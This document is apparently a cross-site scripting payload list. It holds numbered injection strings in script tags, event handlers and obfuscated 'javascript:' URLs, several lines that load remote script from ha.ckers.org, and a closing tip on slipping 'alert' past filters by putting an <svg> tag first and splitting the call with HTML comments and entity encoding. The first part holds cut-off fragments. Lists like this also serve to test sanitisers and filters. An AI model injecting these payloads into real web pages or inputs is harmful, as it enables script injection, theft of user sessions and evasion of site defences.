"'><script>\xE2\x80\x82javascript:alert(159)</script>
"'>
"'><script>\xE1\xA0\x8Ejavascript:alert(161)</script>
"'>
"'><script>\x20javascript:alert(163)</script>
"'>


































XXX
javascript:alert(200)">

<br><a href=http://foo.bar/#x=`y></a></a>"></p><!--[if]><script>javascript:alert(204)</script --><!--[if<img src=x onerror=javascript:alert(205)//]> --><script src="/\%(jscript)s"></script><script src="\\%(jscript)s"></script><p><IMG """><SCRIPT>alert("206")</SCRIPT>"><br><IMG SRC=javascript:alert(String.fromCharCode(50,48,55))><br><IMG SRC=# onmouseover="alert('208')"><br><IMG SRC= onmouseover="alert('209')"><br><IMG onmouseover="alert('210')"><br><IMG SRC=javascript:alert('211')><br><IMG SRC=javascript:alert('212')><br><IMG SRC=javascript:alert('213')><br><IMG SRC="jav ascript:alert('214');"><br><IMG SRC="jav ascript:alert('215');"><br><IMG SRC="jav ascript:alert('216');"><br><IMG SRC="jav ascript:alert('217');"><br>perl -e 'print "<IMG SRC=java\0script:alert(\"218\")>";' > out<br><IMG SRC="  javascript:alert('219');"><br><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><br><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("220")><br><SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT><br><<SCRIPT>alert("221");//<</SCRIPT></p><SCRIPT SRC=http://ha.ckers.org/xss.js?< B ><SCRIPT SRC=//ha.ckers.org/.j><IMG SRC="javascript:alert('222')"<iframe src=http://ha.ckers.org/scriptlet.html <\";alert('223');//<u oncopy=alert()> Copy me</u><i onwheel=alert(224)> Scroll over me </i><plaintext>http://a/%%30%30</textarea><script>alert(225)</script>

You can supercharge your <script> tags for filter bypasses.

How? Easy!

If you prepend your <script> tag with an <svg> tag you can enable a variety of tricks.

-----------
1. HTML inline comments within JavaScript code
aler<!-- -->t(1) ✅

2. HTML encoding within JavaScript code
alert&#x28;1) ✅
-----------

You can even replace the comments with one of these shorter tags: <!> </> and <?>

Combined:
<svg><script>al</>e<?>r<!>t&#x28;1) </script> ✅